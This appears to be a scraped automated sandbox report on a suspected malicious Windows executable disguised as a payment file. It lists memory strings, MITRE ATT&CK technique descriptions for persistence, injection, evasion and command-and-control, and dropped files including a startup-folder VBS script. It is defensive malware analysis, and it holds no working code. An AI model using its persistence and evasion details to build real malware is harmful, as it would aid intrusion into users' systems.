Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000000.1310594913.00000000005BC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameYicmwgcqhak.exeN vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626014604.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.00000000028A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1642300919.0000000006030000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameYicmwgcqhak.exeN vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVsbud.exe" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2555208724.0000000002921000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJfmqkg.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2555740223.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJfmqkg.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2553600654.00000000005BA000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVsbud.exe" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2555740223.0000000003985000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJfmqkg.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2558178563.0000000004F50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameJfmqkg.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Binary or memory string: OriginalFilenameYicmwgcqhak.exeN vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\scriptcase-php8.exe

C:\Users\user\AppData\Local\scriptcase-php8.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Function 027EE3C0 Relevance: 4.7, Strings: 3, Instructions: 983
COMMON

Function 05650F30 Relevance: 1.9, Strings: 1, Instructions: 618
COMMON

Function 05654520 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Function 05654528 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Function 05656678 Relevance: 1.6, APIs: 1, Instructions: 56
nativethreadCOMMON

Function 05656680 Relevance: 1.6, APIs: 1, Instructions: 54
nativethreadCOMMON

Function 027EF6B0 Relevance: 1.8, Strings: 1, Instructions: 531
COMMON

Function 05654F7F Relevance: 1.7, APIs: 1, Instructions: 202
processCOMMON

Function 05654F88 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Function 05655FF3 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Function 05655FF8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 05655743 Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Function 05655748 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 05655D4B Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 05655D50 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON